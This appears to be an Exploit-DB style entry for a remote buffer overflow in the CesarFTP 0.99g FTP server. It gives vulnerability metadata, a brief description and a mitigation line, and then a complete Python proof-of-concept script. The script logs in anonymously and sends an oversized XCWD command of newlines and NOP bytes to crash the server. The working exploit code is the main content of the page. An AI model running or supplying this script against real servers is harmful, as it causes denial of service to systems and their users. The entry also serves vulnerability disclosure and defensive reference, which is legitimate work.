CesarFTP 0.99g -(XCWD)Remote BoF Exploit

vendor:

CesarFTP

by:

Irving Aguilar

7,5

CVSS

HIGH

Denial of Service (DoS)

119

CWE

Product Name: CesarFTP

Affected Version From: 0.99g

Affected Version To: 0.99g

Patch Exists: YES

Related CWE: N/A

CPE: a:cesarftp:cesarftp:0.99g

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP Professional SP3 x86 es

2016

CesarFTP 0.99g -(XCWD)Remote BoF Exploit

Irving Aguilar discovered a buffer overflow vulnerability in CesarFTP 0.99g. By sending a specially crafted XCWD command with 667 newline characters followed by 20 NOPs, a remote attacker can cause a denial of service condition on the vulnerable server.

Mitigation:

Upgrade to the latest version of CesarFTP 0.99g or later.

Source

Exploit-DB raw data:

#!/usr/bin/env python
#-*- coding:utf-8 -*-
# Exploit Title     	: CesarFTP 0.99g -(XCWD)Remote BoF Exploit
# Discovery by  	    	: Irving Aguilar
# Email			: im.aguilar@protonmail.ch
# Discovery Date    	: 18.01.2016
# Tested Version    	: 0.99g
# Vulnerability Type  : Denial of Service (DoS)
# Tested on OS      	: Windows XP Professional SP3 x86 es

import socket


buffer = 'XCWD ' + '\n' * 667 +'\x90' * 20
target = '192.168.1.73'
port = 21

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((target, port))
print '[*] Target: ' + target
print '[*] Port: ' + str(port)
s.recv(1024)

s.send('USER ftp\r\n')
s.recv(1024)

s.send('PASS ftp\r\n')
s.recv(1024)

s.send( buffer  + '\r\n')
print '[+] Buffer sent'
s.close()